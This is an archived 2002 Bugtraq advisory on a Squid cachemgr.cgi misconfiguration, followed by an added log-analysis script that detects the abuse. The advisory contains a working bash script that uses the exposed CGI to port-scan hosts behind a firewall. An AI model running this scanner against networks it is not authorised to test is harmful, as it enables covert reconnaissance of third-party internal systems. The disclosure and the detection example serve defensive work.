Bugtraq mailing list archives

cachemgr.cgi (squid 2.3STABLE4)


From: Francisco Sáa Muñoz <fsaa () ip6seguridad com>
Date: Mon, 4 Feb 2002 17:43:36 +0100

]-* [IP6] Concept: Squid cachemgr.cgi misconfiguration

]-* [IP6] Configuration error [BID error class]

]-* [IP6] Platform investigated:        Linux Redhat 6.2
                                                Squid 2.3STABLE4
                                                Apache 1.3.12

]-* [IP6] The problem...

Due to a misconfiguration of Apache and Squid, it is possible to use
cachemgr.cgi shipped with Squid to scan hosts under the corporate firewall.

...also we can gather a lot of information about the navigation,
configuration...

...also there is a lot of code with bad programmer habits!

There is a lil' script to demonstrate the error, not so clean, but useful.

--- Begin nasty code miscachemgr.cgi ---
#!/bin/bash -x

# Port scanning using a misconfigured squid
# using open apache

# Usage miscachemgr host_vuln host_to_scan end_port

# Concept: Jacobo Van Leeuwen & Francisco Sáa Muñoz
# Coded by Francisco Sáa Muñoz
# IP6 [Logic Control]

PORT=1
ONE='/cgi-bin/cachemgr.cgi?host='
TWO='&port='
THREE='&user_name=&operation&auth='

mkdir from_$1_to_$2

while [ $PORT -lt $3 ]; do

# lynx -dump http://$1/cgi-bin/cachemgr.cgi?host=\
# $2&port=$PORT&user_name=&operation=authenticate&auth= > \
# port_$1_to_$2/$PORT.log 2>&1

lynx -dump http://$1$ONE$2$TWO$PORT$THREE > from_$1_to_$2/$PORT.log 2>&1
let PORT=PORT+1

done
--- End nasty Code ---

]-* [IP6] Solution

Deny access, configure it!

]-* [IP6] Thanks

Thanks to all IP6 staff for the good feeling.

Signed,

--
Francisco Sáa Muñoz :: Nuno Treez (HLP)
Security Consultant/Tiger Team
IP6 Seguridad http://www.ip6seguridad.com
--
Linux User #119288
Proud mame.dk user #115087
--
"What if I'm not elite? Ragna Gronvold says I'm special" (yes, it's from
rfp)
--

]-* [IP6] EOF
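
A defender-side check for the behaviour described in the post, as an added example that is not part of the original message: it reads an Apache access log and lists clients whose cachemgr.cgi requests name many distinct host:port targets. The function names, the threshold default, the common log format and the sample log lines are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original post): list clients whose cachemgr.cgi
# requests in an Apache access log touch many distinct host:port targets.
# $1 = minimum distinct targets per client (assumed default: 5). Log on stdin.
cachemgr_scan_suspects() {
    awk -v min="${1:-5}" '
    # Value of query parameter "name" in query string "qs", or "" if absent.
    function param(qs, name,    n, i, kv, eq) {
        n = split(qs, kv, "&")
        for (i = 1; i <= n; i++) {
            eq = index(kv[i], "=")
            if (eq > 0 && substr(kv[i], 1, eq - 1) == name)
                return substr(kv[i], eq + 1)
        }
        return ""
    }
    {
        # Request line is the first double-quoted field: METHOD URL PROTOCOL
        if (split($0, q, "\"") < 3) next
        if (split(q[2], req, " ") < 2) next
        qpos = index(req[2], "?")
        if (qpos == 0) next
        if (substr(req[2], 1, qpos - 1) !~ /\/cachemgr\.cgi$/) next
        qs = substr(req[2], qpos + 1)
        host = param(qs, "host")
        if (host == "") next
        # Count each client/target pair once, however often it repeats.
        key = $1 SUBSEP host ":" param(qs, "port")
        if (!(key in seen)) { seen[key] = 1; targets[$1]++ }
    }
    END {
        for (c in targets)
            if (targets[c] >= min) print c, targets[c]
    }' | sort
}

# Constructed sample log (documentation addresses, not real traffic).
sample_log() {
    cat <<'EOF'
192.0.2.10 - - [04/Feb/2002:17:40:01 +0100] "GET /cgi-bin/cachemgr.cgi?host=10.0.0.5&port=1&user_name=&operation=authenticate&auth= HTTP/1.0" 200 512
192.0.2.10 - - [04/Feb/2002:17:40:02 +0100] "GET /cgi-bin/cachemgr.cgi?host=10.0.0.5&port=2&user_name=&operation=authenticate&auth= HTTP/1.0" 200 512
192.0.2.10 - - [04/Feb/2002:17:40:03 +0100] "GET /cgi-bin/cachemgr.cgi?host=10.0.0.5&port=3&user_name=&operation=authenticate&auth= HTTP/1.0" 200 512
198.51.100.7 - - [04/Feb/2002:17:41:00 +0100] "GET /cgi-bin/cachemgr.cgi?host=localhost&port=3128&user_name=&operation=authenticate&auth= HTTP/1.0" 200 2048
198.51.100.7 - - [04/Feb/2002:17:42:00 +0100] "GET /cgi-bin/cachemgr.cgi?host=localhost&port=3128&user_name=&operation=authenticate&auth= HTTP/1.0" 200 2048
192.0.2.10 - - [04/Feb/2002:17:43:00 +0100] "GET /index.html HTTP/1.0" 200 1024
EOF
}

sample_log | cachemgr_scan_suspects 3   # prints: 192.0.2.10 3
```

Output is one line per client: the client address followed by the number of distinct host:port targets it requested through cachemgr.cgi.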

